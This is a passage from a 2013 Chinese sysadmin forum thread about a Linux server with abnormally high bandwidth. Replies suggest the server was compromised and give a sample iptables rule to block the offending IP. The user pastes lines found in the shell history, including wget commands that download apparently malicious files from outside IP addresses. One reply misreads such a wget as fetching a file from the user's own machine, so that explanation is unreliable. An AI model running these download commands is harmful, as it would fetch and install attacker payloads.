123 4 / 4 页下一页

[系统安全] linux系统下异常跑高带宽 [复制链接]

zongg

巨富豪门

论坛徽章:: 21

11楼 [报告]

发表于 2013-08-28 10:35 |只看该作者

回复 10# hdreamfly

那你抓紧查一下，也没准有人搞你们呢。看看有没有异常ip 查的，用iptables 干掉。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

hdreamfly

白手起家

论坛徽章:: 0

12楼 [报告]

发表于 2013-08-28 10:36 |只看该作者

wget http://61.164.145.100:81/.wwas.cap
,这句是什么意思，这是在记录里面查讯到的，回复 9# zongg

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

zongg

巨富豪门

论坛徽章:: 21

13楼 [报告]

发表于 2013-08-28 10:45 |只看该作者

回复 12# hdreamfly

这句话的意思是下载你机器上的.wwas.cap 这个文件。你确定这个文件是你们的吗？如果不是，可能被搞了。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

hdreamfly

白手起家

论坛徽章:: 0

14楼 [报告]

发表于 2013-08-28 10:53 |只看该作者

iptables这个怎么弄？现在服务器是在托管那边，那边人首先技术又不是很好的，而且服务态度也差...,这个流量跑高的问题已经残忍的折腾了我半个月了

回复 11# zongg

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

zongg

巨富豪门

论坛徽章:: 21

15楼 [报告]

发表于 2013-08-28 10:59 |只看该作者

回复 14# hdreamfly

[root@web-nginx04 ~]# cat /etc/sysconfig/iptables
# Manual customization of this file is not recommended.
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -s 127.0.0.1 -i lo -j ACCEPT
-A INPUT -i eth1 -p tcp --dport 22 -j ACCEPT
-A INPUT -s xx.xx.xx.xx -j DROP
COMMIT

复制代码

根据你自己的需要修改一下。xx.xx.xx.xx 是写上那个异常的ip
然后service iptables start

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

chenyx

版主

论坛徽章:: 381

16楼 [报告]

发表于 2013-08-28 11:02 |只看该作者

那个61的ip是你的ip还是外部的?如果是外部的,很可能你已经被黑了

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

hdreamfly

白手起家

论坛徽章:: 0

17楼 [报告]

发表于 2013-08-28 11:22 |只看该作者

不是我的，记录里面有好几个： wget http://115.239.225.232:8080/cupsdd
，wget http://61.164.145.100:81/shashou
， wget -c http://117.21.191.197:9999/gettexs
，里面还有这一句话： while [ "1" ]; do eth=$1; RXpre=$(cat /proc/net/dev | grep $eth | tr : " " | awk '{print $2}'); TXpre=$(cat /proc/net/dev | grep $eth | tr : " " | awk '{ print $10}'); sleep 1; RXnext=$(cat /proc/net/dev | grep $eth | tr : " " | awk ' {print $2}'); TXnext=$(cat /proc/net/dev | grep $eth | tr : " " | awk '{print $1 0}'); clear; echo -e "\t RX `date +%k:%M:%S` TX"; RX=$((${RXnext}-${RXpre})); TX=$((${TXnext}-${TXpre})); if [[ $RX -lt 1024 ]];then RX="${RX}B/s"; elif [[ $R X -gt 1048576 ]];then RX=$(echo $RX | awk '{print $1/1048576 "MB/s"}'); else RX= $(echo $RX | awk '{print $1/1024 "KB/s"}'); fi; if [[ $TX -lt 1024 ]];then TX="$ {TX}B/s"; elif [[ $TX -gt 1048576 ]];then TX=$(echo $TX | awk '{print $1/1048576 "MB/s"}')
这是在执行什么东东回复 16# chenyx